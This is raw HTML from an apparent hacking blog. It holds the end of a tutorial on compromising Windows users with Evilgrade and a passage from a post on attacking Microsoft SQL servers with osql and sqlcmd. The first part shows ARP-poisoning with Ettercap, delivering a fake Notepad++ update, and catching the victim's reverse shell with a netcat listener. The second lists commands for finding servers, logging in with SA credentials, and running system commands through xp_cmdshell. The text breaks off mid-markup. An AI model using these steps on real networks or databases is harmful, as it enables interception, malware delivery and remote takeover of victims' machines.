<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></strong><img alt="Hacking using evilgrade 2.0 on Backtrack 5" height="241" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade6.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="519" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">9. The next step is scan hosts in our network, this step is to determine the target. Click Hosts –> Scan for hosts.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="204" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade8.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="368" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">10. After listing all the hosts in the network, we need to set up the target.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="447" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade9.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="595" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">11. We also need to perform Man in the middle attack to intercept all data on network. Click Mitm –> Arp poisoning –> check “Sniff remote connection”.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="278" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade7.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="286" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">12. After everything is set up correctly run the Ettercap to start sniffing.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="124" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade10.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="186" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">13. The next step we will use NetCat to listen on port 1234 that we already defined before when setting up Evilgrade.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">“Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.<br style="margin: 0px; padding: 0px;" />It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.”</em></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
From : <a href="http://netcat.sourceforge.net/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://netcat.sourceforge.net/</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Open new terminal(Ctrl+Alt+T) and run this command</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/07/08/hacking-windows-using-evilgrade/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">nc -l -v -p 1234</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Explanation :<br style="margin: 0px; padding: 0px;" />-l : to listen on any incoming connection<br style="margin: 0px; padding: 0px;" />-v : verbose<br style="margin: 0px; padding: 0px;" />-p : port to listen on</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">14. When the user opening their Notepad Plus application and the application asking for update application automatically like the picture below and user answer YES.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="499" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade11.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="472" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">15. Our NetCat terminal will have something interesting because it’s already on victim shell.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="124" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade12.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="484" /></div>
<h3 style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 0px 0px 5px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Countermeasure :</h3>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
1. It’s better to download directly from the source than automatically update the application</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
2. Always update your antivirus</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-12010561490193564142012-07-16T14:26:00.001+06:002012-07-16T14:26:13.905+06:00Hack Database Servers with SQLCMD and OSQL<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="title" style="background-color: transparent; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 16px 0px 10px 50px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<div class="postmeta" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #666666; font-size: 12px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 580px;">
<br /></div>
</div>
<div class="clear" style="background-color: transparent; border: 0px; clear: both; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
</div>
<div class="entry" style="background-color: transparent; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; overflow: hidden; padding: 10px 20px 0px; text-align: -webkit-auto; vertical-align: baseline;">
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
The osql utility allows you to enter Transact-SQL statements, system procedures, and script files. This utility uses ODBC to communicate with the server.</div>
</blockquote>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">osql -U YourUserName -P YourPassword -S ServerName -d DatabaseName
-n-1 -i DriveLetter:SQLFileNameAndPath.sql -o DriveLetter:LogFile.txt
Switches
-U: login ID for the specified server
-P: password for the login ID
-S: server name
-d: database upon which the script will be executed
-n: removes numbering and the prompt symbol (>) from the output file
-i: the .SQL file name (including drive letter)
-o: an output file that details how the script executed (if at all)</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Finding SQL Servers:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -L</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span id="more-1980" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span>Connect to MSSQL Server using IP address:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -E -S <IP> -Q "<SQL QUERY>"</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Connect to MSSQL Server using instance name:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -E -S SERVERNAME\INSTANCE -Q "<SQL QUERY>"</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Connect to MSSQL Server which listen on non default port (10000):</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -E -S tcp:SERVERNAME,10000 -Q "<SQL QUERY>"</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Connect to MSSQL Server using SA authentication:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -U <username> -P <password> -S SERVERNAME\INSTANCE -Q "<SQL QUERY>"</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Executing System Commands:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -E -S <IP> -Q “xp_cmdshell ‘whoami’”</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Dump results to output file:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\osql -E -S <IP> -Q "<SQL QUERY>" -o .\outfile.txt</pre>
</div>
</div>
</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
The sqlcmd utility lets you enter Transact-SQL statements, system procedures, and script files at the command prompt, in Query Editor in SQLCMD mode, in a Windows script file or in an operating system (Cmd.exe) job step of a SQL Server Agent job. This utility uses OLE DB to execute Transact-SQL batches.</div>
</blockquote>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">Sqlcmd [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w screen width]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-c cmdend] [-L[c] list servers[clean output]]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-m errorlevel] [-V severitylevel] [-W remove trailing spaces]
[-u unicode output] [-r[0|1] msgs to stderr]
[-i inputfile] [-o outputfile] [-z new password]
[-f | i:[,o:]] [-Z new password and exit]
[-k[1|2] remove[replace] control characters]
[-y variable length type display width]
[-Y fixed length type display width]
[-p[1] print statistics[colon format]]
[-R use client regional setting]
[-b On error batch abort]
[-v var = "value"...] [-A dedicated admin connection]
[-X[1] disable commands, startup script, enviroment variables [and exit]]
[-x disable variable substitution]
[-? show syntax summary]</pre>
</div>
</div>
</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">List all local servers:</pre>
</div>
</div>
</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
